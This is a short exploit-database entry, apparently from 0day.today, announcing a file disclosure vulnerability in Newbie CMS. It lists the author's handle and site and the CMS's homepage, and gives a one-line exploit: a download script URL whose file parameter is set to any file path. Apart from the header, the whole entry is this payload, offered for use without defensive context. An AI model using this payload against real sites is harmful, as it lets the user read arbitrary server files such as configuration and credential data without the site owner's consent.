id: 11334
date: 03/16/2010
title: Newbie CMS File Disclosure Vulnerability
author: JiKo
cves: 

========================================
Newbie CMS File Disclosure Vulnerability
========================================

[~]-----------|00|
NAme    :JIKO (JAWAD)
Home    :No-exploit.Com
Mail    : !x!
[~]-----------|01|
    -{Script}
    name :Newbie CMS
    link :http://newbie-cms.com/
 
[~]-----------|02|
    -{3xpl01t}
    http://no-exploit.com/free_download.php?file={FILE}



#  0day.today [2023-03-26]  #